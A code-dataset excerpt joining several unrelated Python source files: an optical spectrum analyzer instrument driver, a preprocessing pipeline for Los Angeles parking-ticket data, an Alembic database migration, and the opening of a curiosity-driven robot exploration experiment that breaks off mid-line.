elif measurement_type.lower() == 'auto':\n raise NotImplementedError('The {type} sweep type is not implemented yet'.format(type=measurement_type))\n elif measurement_type.lower() == 'repeat':\n raise NotImplementedError('The {type} sweep type is not implemented yet'.format(type=measurement_type))\n else:\n raise ValueError('Invalid sweep type given: {type}'.format(type=measurement_type))\n\n self.logger.info('OSA Sweep finished')\n\n trace_text = self._active_trace\n return self._traces.index(trace_text) + 1\n\n def stop(self):\n \"\"\"\n Stops a measurement\n \"\"\"\n self.command(':ABOR')\n\n @property\n def _active_trace(self):\n \"\"\"\n Returns the currently active trace\n :return: string active trace\n \"\"\"\n r = self.request(':TRAC:ACT?')\n return r\n\n @_active_trace.setter\n def _active_trace(self, act_trace):\n \"\"\"\n Sets the active trace, displays it and enables recording to it.\n :param act_trace: string trace\n :return:\n \"\"\"\n if act_trace not in self._traces:\n raise ValueError('Invalid trace given.')\n # enable writing and display for currently selected trace\n self.command(':TRAC:ATTR:' + str(act_trace) + ' WRITE')\n self.command(':TRAC:STATE:' + str(act_trace) + ' ON')\n # fix all other _traces to not be written to\n for fix_trace in self._traces:\n if act_trace == fix_trace:\n continue\n self.command(':TRAC:ATTR:' + str(fix_trace) + ' FIX')\n # set active trace, must be last command given\n self.command(':TRAC:ACT ' + str(act_trace))\n\n def get_data(self):\n \"\"\"\n Get the spectrum data of the measurement. Units depend on the setting on the instrument.\n :return: 2D list with [X-axis Data, Y-Axis Data]\n \"\"\"\n # Make sure the correct data format is used\n # set data format to ascii\n self.command('FORMAT:DATA ASCII')\n act_trace = self._active_trace\n\n wavelength_samples = self.query_ascii_values(':TRAC:DATA:X? {trace}'.format(\n trace=act_trace),\n container=np.ndarray) * 1e9 # data is returned in unit [m], we want it in [nm]\n power_samples = self.query_ascii_values(':TRAC:DATA:Y? {trace}'.format(\n trace=act_trace),\n container=list)\n\n return [wavelength_samples.tolist(), power_samples]\n\n #\n # wavelength properties\n #\n\n @property\n def startwavelength(self):\n \"\"\"\n Returns the start wavelength of the currently set scan window\n :return: start wavelength in nm\n \"\"\"\n return float(self.request(':SENS:WAV:STAR?')) * 1e9\n\n @startwavelength.setter\n def startwavelength(self, start_wavelength_nm):\n \"\"\"\n Set the start wavelength of the scan window\n :param start_wavelength_nm: start wavelength in nm\n \"\"\"\n self.command(':SENS:WAV:STAR {start:0.3f}nm'.format(start=start_wavelength_nm))\n\n @property\n def stopwavelength(self):\n \"\"\"\n Returns the stop wavelength of the currently set scan window\n :return: stop wavelength in nm\n \"\"\"\n return float(self.request(':SENS:WAV:STOP?')) * 1e9\n\n @stopwavelength.setter\n def stopwavelength(self, stop_wavelength_nm):\n \"\"\"\n Set the stop wavelength of the scan window\n :param stop_wavelength_nm: stop wavelength in nm\n \"\"\"\n self.command(':SENS:WAV:STOP {stop:0.3f}nm'.format(stop=stop_wavelength_nm))\n\n @property\n def centerwavelength(self):\n \"\"\"\n Returns current center wavelength [nm].\n :return: center wavelength in nm\n \"\"\"\n return float(self.request(':SENS:WAV:CENT?')) * 1e9\n\n @centerwavelength.setter\n def centerwavelength(self, centerwavelength_nm):\n \"\"\"\n Sets center wavelength\n :param centerwavelength_nm: wavelength in nm\n \"\"\"\n if not 600 <= centerwavelength_nm <= 1700:\n raise ValueError('Center wavelength is out of range. Must be between 600 nm and 1700 nm.')\n\n self.command(':SENS:WAV:CENT {center:0.3f}nm'.format(center=centerwavelength_nm))\n\n @property\n def span(self):\n \"\"\"\n Returns current span\n :return: span in nm\n \"\"\"\n return float(self.request(':SENS:WAV:SPAN?')) * 1e9\n\n @span.setter\n def span(self, span_nm):\n \"\"\"\n Sets span\n :param span_nm: span in nm\n \"\"\"\n self.command(':SENS:WAV:SPAN {span:0.3f}nm'.format(span=span_nm))\n\n #\n # resolution and sensitivity\n #\n\n @property\n def sweepresolution(self):\n \"\"\"\n Returns current resolution\n :return: resolution in nm\n \"\"\"\n return float(self.request(':SENS:BAND:RES?')) * 1e9\n\n @sweepresolution.setter\n def sweepresolution(self, resolution_nm):\n \"\"\"\n Sets resolution\n :param resolution_nm: resolution in nm\n \"\"\"\n if not 0.02 <= resolution_nm <= 2:\n raise ValueError('Resolution must be between 0.02 nm and 2 nm.')\n self.command(':SENS:BAND:RES {:0.3f}nm'.format(resolution_nm))\n\n @property\n def _sweep_mode(self):\n \"\"\"\n Returns current sweep mode\n :return: string sweep mode\n \"\"\"\n return self._sweep_modes[int(self.request(':INIT:SMODE?')) - 1]\n\n @_sweep_mode.setter\n def _sweep_mode(self, _sweep_mode):\n \"\"\"\n Set sweep mode\n :param _sweep_mode: string\n :return:\n \"\"\"\n if _sweep_mode not in self._sweep_modes:\n raise ValueError('Invalid sweep mode given: ' + str(_sweep_mode))\n self.command(':INIT:SMODE ' + str(_sweep_mode))\n\n @property\n def sens_mode(self):\n \"\"\"\n Returns current sensitivity mode\n :return: string sensitivity mode\n \"\"\"\n return self.sens_modes[int(self.request(':SENS:SENS?'))]\n\n @property\n def n_points(self):\n \"\"\"\n Get the number of points for the measurement\n \"\"\"\n return int(self.query(\":SENSe:SWEep:POINTS?\"))\n\n @n_points.setter\n def n_points(self, n_points):\n \"\"\"\n Set the number of points for the measurement\n \"\"\"\n self.command(\":SENSe:SWEep:POINTS \" + str(n_points))\n\n","repo_name":"LabExT/LabExT","sub_path":"LabExT/Instruments/OpticalSpectrumAnalyzerAQ6370C.py","file_name":"OpticalSpectrumAnalyzerAQ6370C.py","file_ext":"py","file_size_in_byte":10780,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"52"} +{"seq_id":"45503874417","text":"import re\nimport pandas as pd\nimport numpy as np\nfrom pyproj import Proj, transform\nimport holidays\nimport os\nfrom sklearn.preprocessing import MinMaxScaler\nimport logging\nfrom src.db_connecting import get_postgis_conn\nfrom scipy.stats import gaussian_kde\n\nlogging.basicConfig(level=os.environ.get(\"LOGGING_LEVEL\", \"INFO\"))\naddresses_full = pd.read_csv(\"Data/addresses-in-the-city-of-los-angeles.csv\")\n\n\ndef insert_agencies_into_db():\n pass\n\n\ndef fill_nas(df):\n df = df.where(pd.notnull(df), None)\n return df\n\n\ndef remove_nas(\n df,\n cols_to_remove_nas=[\n \"Issue time\",\n \"Issue Date\",\n \"Latitude\",\n \"Longitude\",\n \"Location\",\n ],\n):\n \"\"\"\n Drops na rows for the columns cols_to_remove_nas\n\n \"\"\"\n for col in cols_to_remove_nas:\n df = df.loc[df[col].isna() == False]\n return df\n\n\ndef get_holidays_data(df, time_col=\"Exact issuing time\"):\n \"\"\"\n Extracts, for each date,\n whether a date was a public holiday,\n and which day of the week it was.\n TODO: Transform this to weekly data rather,\n where both day of the week AND the time is used.\n The period, with circular transformation should 24*60*7\n and the\n \"\"\"\n # https://pypi.org/project/holidays/\n us_holidays = holidays.CountryHoliday(\"US\", prov=None, state=\"CA\")\n df[\"is_holiday\"] = df[time_col].apply(\n lambda x: 1 if us_holidays.get(x) is not None else 0\n )\n return df\n\n\n\"\"\"\n Will remove coordinates that are not accurate\n\"\"\"\n\n\ndef convert_coordinates(\n df, remove_na_coords=True, longitude_box=[-120, -115], latitude_box=[32, 36]\n):\n # Copied from another Kaggle user\n # Need to remember who\n # coords are in x/y\n # and we want lat/long, this is from the pyproj documentation\n pm = \"\"\"+proj=lcc +lat_1=34.03333333333333\n +lat_2=35.46666666666667\n +lat_0=33.5\n +lon_0=-118 +x_0=2000000 \"\n \"+y_0=500000.0000000002\n +ellps=GRS80 +datum=NAD83\n +to_meter=0.3048006096012192 +no_defs\"\"\"\n df_bad_coords = df.loc[df[\"Latitude\"] == 99999.0]\n df = df.loc[df[\"Latitude\"] != 99999.0]\n\n # convert to lat/long\n x_in, y_in = df[\"Latitude\"].values, df[\"Longitude\"].values\n long, lat = transform(\n Proj(pm, preserve_units=True), Proj(\"+init=epsg:4326\"), x_in, y_in\n )\n df.loc[:, \"Latitude\"] = lat\n df.loc[:, \"Longitude\"] = long\n\n # Ugly hardcoding: make all positive\n # latitudes negative, make all negative\n # longitudes positive\n df.loc[df[\"Latitude\"] < 0, \"Latitude\"] = df.loc[df[\"Latitude\"] < 0, \"Latitude\"] * (\n -1\n )\n df.loc[df[\"Longitude\"] > 0, \"Longitude\"] = df.loc[\n df[\"Longitude\"] > 0, \"Longitude\"\n ] * (-1)\n\n df = df.loc[\n (df[\"Latitude\"] >= latitude_box[0])\n & (df[\"Latitude\"] <= latitude_box[1])\n & (df[\"Longitude\"] >= longitude_box[0])\n & (df[\"Longitude\"] <= longitude_box[1])\n ]\n\n return pd.concat([df, df_bad_coords], axis=0)\n\n\ndef convert_date_to_hourly(df):\n df[\"Issue time\"] = (\n df[\"Issue time\"]\n .astype(\"int64\")\n .astype(\"str\")\n .str.pad(width=4, side=\"left\", fillchar=\"0\")\n )\n df[\"Issue time\"] = (\n df[\"Issue time\"].str.slice(stop=2)\n + \":\"\n + df[\"Issue time\"].str.slice(start=2)\n + \":00\"\n )\n df[\"Exact issuing time\"] = (\n df[\"Issue Date\"].astype(\"str\").str.slice(stop=11)\n + \" \"\n + df[\"Issue time\"].astype(\"str\")\n ).astype(\"datetime64[ns]\")\n df.drop([\"Issue Date\", \"Issue time\"], axis=1, inplace=True)\n return df\n\n\n\"\"\"\n Will impute, probabilistically,\n missing values for a specific column,\n based on other values.\n This is a very simple one,\n and a better approach would\n probably be to impute while regarding other columns as well.\n\"\"\"\n\n\ndef impute_probabilistically(df, col_to_impute, continuous=True):\n\n density = gaussian_kde(df[col_to_impute].dropna())\n x = np.arange(0, df[col_to_impute].dropna().max())\n density = density.evaluate(x)\n # Normalize density to ensure sum of it is 1\n density = np.divide(density, np.sum(density))\n df.loc[df[col_to_impute].isna(), col_to_impute] = np.random.choice(\n x, p=density, size=df[col_to_impute].isna().sum()\n )\n return df\n\n\ndef circular_transformation(df, col_name, period_length=24):\n \"\"\"transforms one periodic pd.series into two pd.series\n\n input:\n\n df - pandas dataframe\n col_name - column with periodical values (hours, days, months, etc.)\n period_length - max units in a period (24 hours in a day, 60 seconds in\n one hour, 7 days in a week)\n\n no validation yet\n\n \"\"\"\n s = df[col_name]\n s_x = s.apply(lambda x: np.sin(x / period_length * 2 * np.pi))\n s_y = s.apply(lambda x: np.cos(x / period_length * 2 * np.pi))\n kwargs = {col_name + \"_cx\": s_x, col_name + \"_cy\": s_y}\n return df.assign(**kwargs)\n\n\ndef fix_time_vars(df, time_col=\"Exact issuing time\"):\n df[\"time_on_day\"] = df[time_col].dt.hour * 60 + df[time_col].dt.minute\n df = circular_transformation(df, \"time_on_day\", 60 * 24)\n df[\"day_of_year\"] = df[time_col].dt.dayofyear\n df = circular_transformation(df, \"day_of_year\", 365)\n df[\"day_of_week\"] = df[time_col].dt.weekday\n df = circular_transformation(df, \"day_of_week\", 7)\n df[\"Year\"] = df[\"Exact issuing time\"].dt.year\n\n df[\"month\"] = df[\"Exact issuing time\"].dt.month\n df = circular_transformation(df, \"month\", 12)\n\n df[\"day_of_month\"] = df[\"Exact issuing time\"].dt.day\n df = circular_transformation(df, \"day_of_month\", 31)\n sc = MinMaxScaler()\n df[\"year_scaled\"] = sc.fit_transform(df[\"Year\"].values.reshape(-1, 1))\n df[\"date issued\"] = df[\"Exact issuing time\"].dt.date\n return df\n\n\ndef generate_grid_points(x_dim, y_dim, time_start, time_end, time_step=\"1H\"):\n all_time_sections = pd.date_range(start=time_start, end=time_end, freq=\"1H\")\n x = np.linspace(0, 1, x_dim + 1)[1:]\n y = np.linspace(0, 1, y_dim + 1)[1:]\n n = pd.MultiIndex.from_product(\n [all_time_sections, x, y], names=[\"Time section\", \"grid_x\", \"grid_y\"]\n )\n n = n.to_frame()\n n.columns = [\"1\", \"2\", \"3\"]\n n = n.reset_index().drop([\"1\", \"2\", \"3\"], axis=1)\n n = fix_time_vars(n, \"Time section\")\n n = get_holidays_data(n, \"Time section\")\n return n\n\n\ndef rename_column(x):\n return re.sub(r\"\\W+\", \"\", x).lower()\n\n\ndef batch_preprocessing(conn=None):\n \"\"\"\n Preprocesses all the data in batches.\n \"\"\"\n colmapping = {\n \"TICKETNUMBER\".lower(): \"Ticket number\",\n \"ISSUEDATE\".lower(): \"Issue Date\",\n \"ISSUETIME\".lower(): \"Issue time\",\n \"METERID\".lower(): \"Meter Id\",\n \"MARKEDTIME\".lower(): \"Marked Time\",\n \"RPSTATEPLATE\".lower(): \"RP State Plate\",\n \"PLATEEXPIRYDATE\".lower(): \"Plate Expiry Date\",\n \"VIN\".lower(): \"VIN\",\n \"MAKE\".lower(): \"Make\",\n \"BODYSTYLE\".lower(): \"Body Style\",\n \"COLOR\".lower(): \"Color\",\n \"LOCATION\".lower(): \"Location\",\n \"ROUTE\".lower(): \"Route\",\n \"AGENCYCODE\".lower(): \"Agency\",\n \"VIOLATIONCODE\".lower(): \"Violation code\",\n \"VIOLATIONDESC\".lower(): \"Violation Description\",\n \"FINEAMOUNT\".lower(): \"Fine amount\",\n \"LATITUDE\".lower(): \"Latitude\",\n \"LONGITUDE\".lower(): \"Longitude\",\n \"AGENCYDESCRIPTION\".lower(): \"Agency Description\",\n \"COLORDESCRIPTION\".lower(): \"Color Description\",\n \"BODYSTYLEDESC\".lower(): \"Body Style Description\",\n }\n colmapping_reversed = {\n \"Ticket number\": \"TICKETNUMBER\",\n \"Issue Date\": \"ISSUEDATE\",\n \"Issue time\": \"ISSUETIME\",\n \"Meter Id\": \"METERID\",\n \"Marked Time\": \"MARKEDTIME\",\n \"RP State Plate\": \"RPSTATEPLATE\",\n \"Plate Expiry Date\": \"PLATEEXPIRYDATE\",\n \"VIN\": \"VIN\",\n \"Make\": \"MAKE\",\n \"Body Style\": \"BODYSTYLE\",\n \"Color\": \"COLOR\",\n \"Location\": \"LOCATION\",\n \"Route\": \"ROUTE\",\n \"Agency\": \"AGENCYCODE\",\n \"Violation code\": \"VIOLATIONCODE\",\n \"Violation Description\": \"VIOLATIONDESC\",\n \"Fine amount\": \"FINEAMOUNT\",\n \"Latitude\": \"LATITUDE\",\n \"Longitude\": \"LONGITUDE\",\n \"Agency Description\": \"AGENCYDESCRIPTION\",\n \"Color Description\": \"COLORDESCRIPTION\",\n \"Body Style Description\": \"BODYSTYLEDESC\",\n }\n\n if conn is None:\n conn = get_postgis_conn()\n count = 0\n cur = conn.cursor()\n chunksize = int(5e5)\n while True:\n query = \"SELECT * FROM PARKINGTICKET_RAW LIMIT {} OFFSET {};\".format(\n chunksize, count * chunksize\n )\n raw_df = (\n fill_nas(pd.read_sql(query, conn))\n .rename(colmapping, axis=1)\n .drop(\"id\", axis=1)\n )\n\n if raw_df.shape[0] == 0:\n break\n df = fill_nas(full_preprocessing(raw_df))\n table = \"PARKINGTICKET\"\n logging.info(\"Inserting into db!\")\n df.columns = [rename_column(x) for x in list(df)]\n df_dict = df.to_dict(orient=\"records\")\n\n cur.executemany(\n \"\"\"INSERT INTO {}({}) VALUES ({})\"\"\".format(\n table,\n \",\".join(list(df.rename(colmapping_reversed, axis=1).columns)),\n \"%(\" + \")s,%(\".join(list(df.columns)) + \")s\",\n ),\n df_dict,\n )\n # Now, insert into the database.\n conn.commit()\n count += 1\n logging.info(\"Inserted processed batch {}\".format(count))\n\n conn.close()\n\n\n\"\"\"\n Does a complete preprocessing\n of a raw dataframe\n incoming to do the density\n\"\"\"\n\n\ndef full_preprocessing(raw_df, verbose=True):\n if verbose:\n logging.info(\"Removing the ones with NA-vals in important columns\")\n df = remove_nas(raw_df)\n if verbose:\n logging.info(\"Converting coordinates\")\n df = convert_coordinates(df)\n df = df.merge(fix_locations(df), on=\"Ticket number\")\n df.drop_duplicates(subset=[\"Ticket number\"], inplace=True)\n imputed_coords = impute_coordinates(df)\n imputed_coords[\"is_imputed\"] = True\n if verbose:\n logging.info(\"Adding imputed coordinates from locations\")\n df = df.merge(imputed_coords, how=\"left\", on=\"Ticket number\")\n df.loc[df[\"is_imputed\"] == True, \"Latitude\"] = df.loc[\n df[\"is_imputed\"] == True, \"LAT\"\n ]\n df.loc[df[\"is_imputed\"] == True, \"Longitude\"] = df.loc[\n df[\"is_imputed\"] == True, \"LON\"\n ]\n df = df.loc[df.Latitude != 99999.0]\n df.drop(\n [\n \"HSE_DIR_CD_y\",\n \"HSE_NBR_y\",\n \"STR_SFX_CD_y\",\n \"STR_NM_y\",\n \"LAT\",\n \"LON\",\n \"is_imputed\",\n ],\n axis=1,\n inplace=True,\n )\n logging.info(list(df))\n df.columns = [\n \"Ticket number\",\n \"Issue Date\",\n \"Issue time\",\n \"Meter Id\",\n \"Marked Time\",\n \"RP State Plate\",\n \"Plate Expiry Date\",\n \"VIN\",\n \"Make\",\n \"Body Style\",\n \"Color\",\n \"Location_x\",\n \"Route\",\n \"Agency\",\n \"Violation code\",\n \"Violation Description\",\n \"Fine amount\",\n \"Latitude\",\n \"Longitude\",\n \"Agency Description\",\n \"Color Description\",\n \"Body Style Description\",\n \"Location\",\n \"HSE_DIR_CD\",\n \"HSE_NBR\",\n \"STR_SFX_CD\",\n \"STR_NM\",\n ]\n df = convert_date_to_hourly(df)\n df = df.loc[(df[\"Exact issuing time\"].astype(\"int64\") > 1.4 * 10 ** 18)]\n df = fill_nas(df)\n return df\n\n\ndef get_street_name(x):\n to_check = [str(x[\"HSE_NBR\"])]\n if x[\"HSE_DIR_CD\"] is not None:\n to_check.append(x[\"HSE_DIR_CD\"])\n\n if x[\"STR_SFX_CD\"] is not None:\n to_check.append(x[\"STR_SFX_CD\"])\n return \" \".join(\n [\n s\n for s in x[\"Location\"].split()\n if s not in to_check\n and str(x[\"HSE_NBR\"]) not in s[: len(str(x[\"HSE_NBR\"]))]\n ]\n )\n\n\ndef impute_coordinates(df, df_has_loc_info=True):\n global addresses_full\n if df_has_loc_info is False:\n locations = fix_locations(df)\n else:\n locations = df[\n [\"Ticket number\", \"HSE_DIR_CD\", \"HSE_NBR\", \"STR_SFX_CD\", \"STR_NM\"]\n ]\n types = {\n \"HSE_DIR_CD\": \"str\",\n \"HSE_NBR\": \"int64\",\n \"STR_SFX_CD\": \"str\",\n \"STR_NM\": \"str\",\n }\n for col in types:\n addresses_full.loc[:, col] = addresses_full[col].astype(types[col])\n locations.loc[:, col] = locations[col].astype(types[col])\n addresses_full = addresses_full.applymap(\n lambda x: x.strip() if isinstance(x, str) else x\n )\n locations = locations.applymap(lambda x: x.strip() if isinstance(x, str) else x)\n a = addresses_full[\n [\"HSE_DIR_CD\", \"HSE_NBR\", \"STR_SFX_CD\", \"STR_NM\", \"LAT\", \"LON\"]\n ].merge(locations, on=[\"HSE_DIR_CD\", \"HSE_NBR\", \"STR_SFX_CD\", \"STR_NM\"])\n b = addresses_full[\n [\"HSE_DIR_CD\", \"HSE_NBR\", \"STR_SFX_CD\", \"STR_NM\", \"LAT\", \"LON\"]\n ].merge(locations, on=[\"HSE_NBR\", \"STR_SFX_CD\", \"STR_NM\"])\n b = b.loc[b[\"HSE_DIR_CD_x\"] != b[\"HSE_DIR_CD_y\"]]\n b.rename({\"HSE_DIR_CD_x\": \"HSE_DIR_CD\"}, axis=1, inplace=True)\n b.drop([\"HSE_DIR_CD_y\"], axis=1, inplace=True)\n return pd.concat([a, b], axis=0).drop_duplicates(subset=[\"Ticket number\"])\n\n\ndef fix_locations(df):\n addresses_full = pd.read_csv(\"Data/addresses-in-the-city-of-los-angeles.csv\")\n locations = pd.DataFrame(df[[\"Ticket number\", \"Location\"]])\n locations[\"HSE_DIR_CD\"] = locations[\"Location\"].str.extract(\n r\"(\\bE\\b|\\bN\\b|\\bW\\b|\\bS\\b)\"\n )\n locations[\"HSE_NBR\"] = locations[\"Location\"].apply(\n lambda x: [\n s\n for s in x.split()\n if re.search(r\"\\d+\", s) is not None\n and (any([y in s for y in [\"ST\", \"RD\", \"ND\", \"TH\"]]) == False)\n ]\n )\n locations[\"HSE_NBR\"] = (\n locations[\"HSE_NBR\"]\n .apply(lambda x: x[0] if len(x) > 0 else \"\")\n .str.extract(r\"(\\d+)\")\n )\n locations[\"STR_SFX_CD\"] = locations[\"Location\"].str.extract(\n r\"(\\b\"\n + \"\\\\b|\\\\b\".join(list(addresses_full.STR_SFX_CD.value_counts().index))\n + \")\"\n )\n locations[\"HSE_NBR\"].fillna(0, inplace=True)\n locations[\"STR_NM\"] = locations.apply(lambda x: get_street_name(x), axis=1)\n\n return locations\n\n\ndef extract_more_coordinates(df, df_has_loc_info=True):\n \"\"\"\n Tries to extract as many\n coordinates as possible,\n and adds these new ones to the main data frame.\n \"\"\"\n df = df.loc[df.Location.isna() == False]\n df_wo_coords = df.loc[df.Latitude == 99999.0]\n locations = impute_coordinates(df_wo_coords, df_has_loc_info)\n df_wo_coords = df_wo_coords.merge(\n locations[[\"Ticket number\", \"LAT\", \"LON\"]], on=\"Ticket number\", how=\"left\"\n )\n df_wo_coords = df_wo_coords.drop([\"Latitude\", \"Longitude\"], axis=1).rename(\n {\"LAT\": \"Latitude\", \"LON\": \"Longitude\"}, axis=1\n )\n logging.info(df_wo_coords.head())\n df_wo_coords.dropna(subset=[\"Latitude\", \"Longitude\"], inplace=True)\n return pd.concat([df_wo_coords, df], axis=0).drop_duplicates(\n subset=[\"Ticket number\"], keep=\"first\"\n )\n","repo_name":"Filco306/ParkingTicketPredsLA","sub_path":"src/preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":15171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15331102065","text":"\"\"\"allow null file summary\n\nRevision ID: 59f23455295a\nRevises: 1bb8b462a580\nCreate Date: 2021-09-15 15:57:33.923637\n\n\"\"\"\n\n# pylint: disable-all\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '59f23455295a'\ndown_revision = '1ee42f0ba37d'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('self_serve_source', schema=None) as batch_op:\n batch_op.alter_column(\n 'file_summary_id', existing_type=sa.INTEGER(), nullable=True\n )\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('self_serve_source', schema=None) as batch_op:\n batch_op.alter_column(\n 'file_summary_id', existing_type=sa.INTEGER(), nullable=False\n )\n\n # ### end Alembic commands ###\n","repo_name":"Zenysis/Harmony","sub_path":"web/server/migrations/versions/59f23455295a_allow_null_file_summary.py","file_name":"59f23455295a_allow_null_file_summary.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"52"} +{"seq_id":"33974426905","text":"from __future__ import print_function\n\nimport numpy as np\nfrom environment import ArmToolsToysEnvironment\nfrom explauto.utils import prop_choice\nimport time\nfrom learning_module import LearningModule\nimport matplotlib.pyplot as plt\nimport cProfile\nimport pickle\n\n\nclass Experiment(object):\n def __init__(self, \n seed=0,\n explo_noise=0.05, \n rmb_prop=0.1, \n optim_explo=\"full\", \n n_explore=4, \n condition=\"RMB\",\n end_point=False,\n distractors=\"both\"):\n \n self.seed = seed\n self.explo_noise = explo_noise\n self.rmb_prop = rmb_prop\n self.optim_explo = optim_explo\n self.n_explore = n_explore\n self.condition = condition\n self.end_point = end_point\n self.distractors = distractors\n \n np.random.seed(self.seed)\n \n \n self.environment = ArmToolsToysEnvironment(\n rdm_distractors=distractors == \"random\" or distractors == \"both\")\n \n self.data = []\n self.interests_evolution = []\n self.explo = None\n self.chosen_modules = []\n self.steps = []\n self.i = 0\n \n # Define motor and sensory spaces:\n self.m_ndims = 4 # number of motor parameters\n self.s_ndims = 31 # number of sensory parameters\n self.max_steps = 5\n self.m_space = range(self.m_ndims)\n self.s_hand = range(self.m_ndims, self.m_ndims+3)\n self.s_tool1 = range(self.m_ndims+3, self.m_ndims+5)\n self.s_tool2 = range(self.m_ndims+5, self.m_ndims+7)\n self.s_obj1 = range(self.m_ndims+7, self.m_ndims+9)\n self.s_obj2 = range(self.m_ndims+9, self.m_ndims+11)\n self.s_obj3 = range(self.m_ndims+11, self.m_ndims+13)\n self.s_obj4 = range(self.m_ndims+13, self.m_ndims+15)\n self.s_obj5 = range(self.m_ndims+15, self.m_ndims+17)\n self.s_obj6 = range(self.m_ndims+17, self.m_ndims+19)\n self.s_obj7 = range(self.m_ndims+19, self.m_ndims+21)\n self.s_obj8 = range(self.m_ndims+21, self.m_ndims+23)\n self.s_obj9 = range(self.m_ndims+23, self.m_ndims+25)\n self.s_obj10 = range(self.m_ndims+25, self.m_ndims+27)\n self.s_obj11 = range(self.m_ndims+27, self.m_ndims+29)\n self.s_obj12 = range(self.m_ndims+29, self.m_ndims+31)\n \n self.s_flat = range(self.m_ndims, self.m_ndims + 31)\n \n self.s_spaces = dict(s_hand = range(self.m_ndims, self.m_ndims+3),\n s_tool1 = range(self.m_ndims+3, self.m_ndims+5),\n s_tool2 = range(self.m_ndims+5, self.m_ndims+7),\n s_obj1 = range(self.m_ndims+7, self.m_ndims+9),\n s_obj2 = range(self.m_ndims+9, self.m_ndims+11),\n s_obj3 = range(self.m_ndims+11, self.m_ndims+13),\n s_obj4 = range(self.m_ndims+13, self.m_ndims+15),\n s_obj5 = range(self.m_ndims+15, self.m_ndims+17),\n s_obj6 = range(self.m_ndims+17, self.m_ndims+19),\n s_obj7 = range(self.m_ndims+19, self.m_ndims+21),\n s_obj8 = range(self.m_ndims+21, self.m_ndims+23),\n s_obj9 = range(self.m_ndims+23, self.m_ndims+25),\n s_obj10 = range(self.m_ndims+25, self.m_ndims+27),\n s_obj11 = range(self.m_ndims+27, self.m_ndims+29),\n s_obj12 = range(self.m_ndims+29, self.m_ndims+31))\n \n # Create learning modules:\n self.learning_modules = {}\n if condition == \"FRGB\" or condition == \"rmb\":\n self.n_explore = 1\n self.n_test = 0\n self.learning_modules['mod1'] = LearningModule(\"mod1\", self.m_space, self.s_flat, self.max_steps, \n self.environment.conf, explo_noise=explo_noise, optim_explo=\"full\", end_point=end_point)\n elif condition == \"SGS\":\n self.n_explore = 1\n self.n_test = 0\n self.learning_modules['mod4'] = LearningModule(\"mod4\", self.m_space, self.s_obj1, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n \n else:\n self.n_test = 1\n \n self.learning_modules['mod1'] = LearningModule(\"mod1\", self.m_space, self.s_hand, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n self.learning_modules['mod2'] = LearningModule(\"mod2\", self.m_space, self.s_tool1, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n self.learning_modules['mod3'] = LearningModule(\"mod3\", self.m_space, self.s_tool2, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n \n self.learning_modules['mod4'] = LearningModule(\"mod4\", self.m_space, self.s_obj1, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n \n self.learning_modules['mod7'] = LearningModule(\"mod7\", self.m_space, self.s_obj4, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n \n if distractors == \"random\" or distractors == \"both\":\n self.learning_modules['mod10'] = LearningModule(\"mod10\", self.m_space, self.s_obj7, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n self.learning_modules['mod11'] = LearningModule(\"mod11\", self.m_space, self.s_obj8, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n \n if distractors == \"static\" or distractors == \"both\":\n self.learning_modules['mod5'] = LearningModule(\"mod5\", self.m_space, self.s_obj2, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n self.learning_modules['mod6'] = LearningModule(\"mod6\", self.m_space, self.s_obj3, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n \n self.learning_modules['mod8'] = LearningModule(\"mod8\", self.m_space, self.s_obj5, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n self.learning_modules['mod9'] = LearningModule(\"mod9\", self.m_space, self.s_obj6, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n \n self.learning_modules['mod12'] = LearningModule(\"mod12\", self.m_space, self.s_obj9, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n self.learning_modules['mod13'] = LearningModule(\"mod13\", self.m_space, self.s_obj10, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n self.learning_modules['mod14'] = LearningModule(\"mod14\", self.m_space, self.s_obj11, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n self.learning_modules['mod15'] = LearningModule(\"mod15\", self.m_space, self.s_obj12, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n \n self.avg_steps = 1.\n \n self.n_stick1_moved = 0\n self.n_stick2_moved = 0\n self.n_obj1_moved = 0\n self.n_obj2_moved = 0\n self.last_print = 0\n \n def execute_perceive(self, m):\n steps = len(m)//self.m_ndims\n s = self.environment.update(m) # execute this command and observe the corresponding sensory effect\n ms_array = np.zeros((steps, self.m_ndims + self.s_ndims), dtype=np.float16)\n ms_array[:,:self.m_ndims] = np.array(np.split(np.array(m), steps), dtype=np.float16)\n ms_array[:,self.m_ndims:] = np.array(np.split(np.array(s), steps), dtype=np.float16)\n #print \"ms_array\", ms_array, 